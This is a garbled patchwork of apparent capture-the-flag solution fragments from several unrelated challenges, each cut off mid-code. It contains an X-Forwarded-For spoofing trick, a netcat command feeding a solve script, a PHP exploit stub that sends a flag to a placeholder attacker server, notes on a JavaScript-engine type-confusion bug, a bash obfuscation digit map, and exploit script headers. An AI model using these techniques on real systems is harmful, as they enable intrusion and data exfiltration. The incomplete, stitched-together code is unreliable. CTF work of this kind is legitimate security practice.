Web100 asked us to connect to the website from 12 different IPs from different countries. Instead of using proxies, you could simply set the X-Forwarded-For header to an IP from the required country. A list of country-to-IP mappings can be found at http://www.nirsoft.net/countryip/nl.html. After doing it 12 times, it would return the flag.

nc minbashmaxfun 1337 -v <<<$(python solve.py file dump_flag.sh )

<?php
$target = 'http://127.0.0.1/';
$exploit = 'http://yourserver:1337/exploit.php';
$exfil = 'http://yourserver:1337/FLAG=';
function enc($s) {
    $res = '';
    for ($i = 0; $i < strlen($s); $i++) {
        $res .= '\\' . dechex(ord($s[$i]));
    }

import requests
from PIL import Image
from StringIO import StringIO
def get_flag_rgb():
    rgb = []
    flag = requests.get("https://cryptoengine.stillhackinganyway.nl/flag").content
    for i in range(20, 480, 40):
        rgb.append(pixel(flag, i))

////////////////////////////////////////////////////////////////////////////
//
// The vulnerability was that the following line of code could change the type of the
// underlying Array from JavascriptNativeIntArray to JavascriptArray:
//
// spreadableCheckedAndTrue = JavascriptOperators::IsConcatSpreadable(aItem) != FALSE;
//
// As can be seen in the provided .diff, the check for whether the type of the pDestArray has changed
// was removed. If the aItem then is not a JavascriptArray, the following code path is taken:
// else

import sys
m = {
    '0' : '$[$?/$$]',
    '1' : '$?',
    '2' : '$[$?+$?]',
    '3' : '$[$?+$?+$?]',
    '4' : '$[$?+$?+$?+$?]',
    '5' : '$[$?+$?+$?+$?+$?]',
    '6' : '$[($?+$?+$?)*($?+$?)]',

#!/usr/bin/env python
import sys
import socket
import struct
import telnetlib
import time
import re
import string

#!/usr/bin/env python
#coding: UTF-8
import struct
import socket
import telnetlib
import sys
if len(sys.argv) > 1 and sys.argv[1] == "l":
    print "=== local exploit"